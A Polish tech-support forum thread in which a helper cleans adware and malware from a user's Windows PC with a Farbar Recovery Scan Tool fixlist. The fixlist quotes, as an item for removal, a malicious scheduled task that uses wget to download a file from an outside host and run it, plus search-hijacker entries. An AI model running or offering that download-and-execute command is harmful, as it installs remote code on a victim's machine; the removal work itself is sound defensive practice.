Składnik instalatora .runonce zawiesza start systemu

Dla specjalistów Bezpieczeństwo
#1

Witam, mam problem ze składnikiem instalatora, który podałem w tytule po jednej z nieudanych instalacji programu. Proszę o pomoc. Wklejam logi:

 

http://wklejto.pl/221511

http://www.wklejto.pl/221512

#2

Pobierz Farbar Recovery Scan Tool http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/ zgodny z wersją systemu 32-bit lub 64-bit.

Uruchom FRST i kliknij Scan. Pokaż raport FRST i Addition.

#3

http://wklejto.pl/221514

http://www.wklejto.pl/221515

#4

Otwórz notatnik systemowy i wklej:

Task: {0E2B92B8-0CA2-4309-B5A4-CFE45D3F9B09} - System32\Tasks\{AACA0DB6-B87A-4080-86B1-5EE20BBE2206} = Firefox.exe http://ui.skype.com/ui/0/5.1.0.112/en/abandoninstall?page=tsMainamp;installinfo=google-toolbar:notoffered;ienotdefaultbrowser2,google-chrome:notoffered;systemlevelpresent
Task: {295AB9B5-1239-45C9-A399-112A73D20F42} - System32\Tasks\{20B4667E-A1D7-43F3-A25D-1D34746D6473} = Firefox.exe http://ui.skype.com/ui/0/5.3.0.120/en/abandoninstall?page=tsMainamp;installinfo=google-toolbar:notoffered;ienotdefaultbrowser2,google-chrome:notoffered;systemlevelpresent
Task: {34FD4368-3696-4FF0-9D85-2260F40CD4AD} - System32\Tasks\{898C9483-0D1E-449E-8C7E-284CD08758D5} = Firefox.exe http://ui.skype.com/ui/0/5.5.0.124/en/abandoninstall?page=tsPluginamp;installinfo=google-toolbar:notoffered;notincluded,google-chrome:notoffered;disabled
Task: {CE5274F1-EE3B-4DD2-8B68-D5F7AC49DE8F} - System32\Tasks\SYSTEM = cmd.exe /R cd "C:\ProgramData" amp; ping 1.1.1.1 -n 300 -w 1000 amp; wget -t 0 --retry-connrefused -O dat.bmp http://grigle.in/index.php?data=FnW8p883Ap;Nero_7.10.1.0.exe;1422648940 amp; start cmd /R dat.bmp ==== ATTENTION
Task: {D59460F8-80C2-4671-BFEB-E45CB6E4C673} - System32\Tasks\WSE_Vosteran = C:\Users\xyz\AppData\Roaming\WSE_Vosteran\UpdateProc\UpdateTask.exe [2015-01-29] () ==== ATTENTION
Task: C:\Windows\Tasks\WSE_Vosteran.job = C:\Users\xyz\AppData\Roaming\WSE_VO~1\UPDATE~1\UPDATE~1.EXE ==== ATTENTION
HKLM\...\Run: [RtHDVCpl] = C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe [6724128 2009-02-11] (Realtek Semiconductor)
HKLM\...\Run: [SunJavaUpdateSched] = C:\Program Files\Common Files\Java\Java Update\jusched.exe [271744 2014-09-26] (Oracle Corporation)
HKLM\...\Run: [NBKeyScan] = "C:\Program Files\Nero\Nero8\Nero BackItUp\NBKeyScan.exe"
HKLM\...\RunOnce: [WSE_Vosteran] = C:\Windows\system32\wscript.exe /E:vbscript /B "C:\Users\xyz\AppData\Roaming\WSE_Vosteran\UpdateProc\bkup.dat"
HKU\S-1-5-21-1628744980-273724389-3362731733-1000\...\RunOnce: [WSE_Vosteran] = C:\Windows\system32\wscript.exe /E:vbscript /B "C:\Users\xyz\AppData\Roaming\WSE_Vosteran\UpdateProc\bkup.dat"
AppInit_DLLs: C:/PROGRA~2/{9BF87~1/171~1.0/sodo.dll = C:/PROGRA~2/{9BF87~1/171~1.0/sodo.dll [649216 2015-01-29] ()
GroupPolicy: Group Policy on Chrome detected ======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction ======= ATTENTION
HKU\S-1-5-21-1628744980-273724389-3362731733-1000\Software\Microsoft\Internet Explorer\Main,Start Page = http://rts.dsrlte.com?affID=na
SearchScopes: HKLM - DefaultScope value is missing.
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://vosteran.com/results.php?f=4q={searchTerms}a=vst_aw_15_05_ffcd=2XzuyEtN2Y1L1QzutDtDtBtAyD0A0EyCtD0EyDzyyD0F0A0FtN0D0Tzu0StCtCtByEtN1L2XzutAtFyBtFtBtFtCtN1L1Czu0C0I0S0V0E0R1V1BtAtN1L1G1B1V1N2Y1L1Qzu2StA0C0E0FyC0C0EtAtGyE0F0D0CtGyBzzyDyDtGyE0DtCtCtGyDtB0DtAyD0B0BzzzzyCyBtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyD0A0D0ByCyDtD0DtGtA0BtB0BtGyE0FtB0FtGzz0DyE0BtG0FyDyEtDtDyD0F0CtCtDtCtD2QtN1B1L1H1Ezu1O2U1M1Bcr=692820243ir=
SearchScopes: HKU\S-1-5-21-1628744980-273724389-3362731733-1000 - DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://vosteran.com/results.php?f=4q={searchTerms}a=vst_aw_15_05_ffcd=2XzuyEtN2Y1L1QzutDtDtBtAyD0A0EyCtD0EyDzyyD0F0A0FtN0D0Tzu0StCtCtByEtN1L2XzutAtFyBtFtBtFtCtN1L1Czu0C0I0S0V0E0R1V1BtAtN1L1G1B1V1N2Y1L1Qzu2StA0C0E0FyC0C0EtAtGyE0F0D0CtGyBzzyDyDtGyE0DtCtCtGyDtB0DtAyD0B0BzzzzyCyBtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyD0A0D0ByCyDtD0DtGtA0BtB0BtGyE0FtB0FtGzz0DyE0BtG0FyDyEtDtDyD0F0CtCtDtCtD2QtN1B1L1H1Ezu1O2U1M1Bcr=692820243ir=
SearchScopes: HKU\S-1-5-21-1628744980-273724389-3362731733-1000 - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://vosteran.com/results.php?f=4q={searchTerms}a=vst_aw_15_05_ffcd=2XzuyEtN2Y1L1QzutDtDtBtAyD0A0EyCtD0EyDzyyD0F0A0FtN0D0Tzu0StCtCtByEtN1L2XzutAtFyBtFtBtFtCtN1L1Czu0C0I0S0V0E0R1V1BtAtN1L1G1B1V1N2Y1L1Qzu2StA0C0E0FyC0C0EtAtGyE0F0D0CtGyBzzyDyDtGyE0DtCtCtGyDtB0DtAyD0B0BzzzzyCyBtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyD0A0D0ByCyDtD0DtGtA0BtB0BtGyE0FtB0FtGzz0DyE0BtG0FyDyEtDtDyD0F0CtCtDtCtD2QtN1B1L1H1Ezu1O2U1M1Bcr=692820243ir=
SearchScopes: HKU\S-1-5-21-1628744980-273724389-3362731733-1000 - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL =
SearchScopes: HKU\S-1-5-21-1628744980-273724389-3362731733-1000 - {E89D0C89-2ECD-4514-ABC1-887BC9EFF2CC} URL = http://rts.dsrlte.com/?affID=naq={searchTerms}r=927
FF DefaultSearchEngine: Vosteran
FF SelectedSearchEngine: Yahoo! Search
FF Homepage: hxxp://rts.dsrlte.com?affID=na
FF SearchPlugin: C:\Users\xyz\AppData\Roaming\Mozilla\Firefox\Profiles\t20vo22e.default\searchplugins\dsrlte.xml
FF SearchPlugin: C:\Users\xyz\AppData\Roaming\Mozilla\Firefox\Profiles\t20vo22e.default\searchplugins\Vosteran.xml
CHR RestoreOnStartup: Default - "hxxp://search.yahoo.com/?fr=hp-ddc-bdtype=616_pr __alt__ ddc_dsssyc_bd_com"
CHR StartupUrls: Default - "hxxp://search.yahoo.com/?fr=hp-ddc-bdtype=616_pr __alt__ ddc_dsssyc_bd_com"
CHR DefaultNewTabURL: Default - http://search.yahoo.com/?fr=hp-ddc-bd-tabtype=616_pr __alt__ ddc_dsssyctab_bd_com
CHR HKLM\...\Chrome\Extension: [oilkkkefbalmbfppgjmgjoefbclebkce] - No Path
CHR HKU\S-1-5-21-1628744980-273724389-3362731733-1000\...\Chrome\Extension: [oilkkkefbalmbfppgjmgjoefbclebkce] - No Path
S2 Nero BackItUp Scheduler 4.0; C:\Program Files\Common Files\Nero\Nero BackItUp 4\NBService.exe [X]
S3 WPFFontCache_v0400; C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\WPFFontCache_v0400.exe [X]
R1 {371bcf01-e691-44bf-9345-60788e5d16a5}t; C:\Windows\System32\drivers\{371bcf01-e691-44bf-9345-60788e5d16a5}t.sys [55832 2015-01-29] (StdLib)
2015-01-29 23:03 - 2015-01-29 23:03 - 00000000 ____ D () C:\Users\xyz\AppData\Local\Pay-By-Ads
2015-01-29 23:03 - 2015-01-29 10:33 - 00055832 _____ (StdLib) C:\Windows\system32\Drivers\{371bcf01-e691-44bf-9345-60788e5d16a5}t.sys
2015-01-29 22:54 - 2015-01-31 18:54 - 00000284 _____ () C:\Windows\Tasks\WSE_Vosteran.job
2015-01-29 22:54 - 2015-01-29 22:54 - 00000000 ____ D () C:\Users\xyz\AppData\Roaming\WSE_Vosteran
2015-01-29 22:54 - 2015-01-29 22:54 - 00000000 ____ D () C:\ProgramData\{9BF8733B-CB7A-A2BD-7AFC-D23FAA7E01B1}
2015-01-29 22:54 - 2015-01-29 22:54 - 00000000 ____ D () C:\Program Files\WSE_Vosteran
2015-01-29 22:53 - 2015-01-29 23:29 - 00000000 ____ D () C:\Program Files\Solution Real
2013-01-04 13:04 - 2014-05-21 17:49 - 0001330 _____ () C:\Users\xyz\AppData\Roaming\wklnhst.dat
C:\ProgramData\wget.exe
EmptyTemp:

Plik zapisz pod nazwą fixlist.txt i umieść obok FRST w tym samym folderze.

#5

Wyczyszczone, od razu widać różnicę. Dziękuję!

#6

Skasuj folder C:\FRST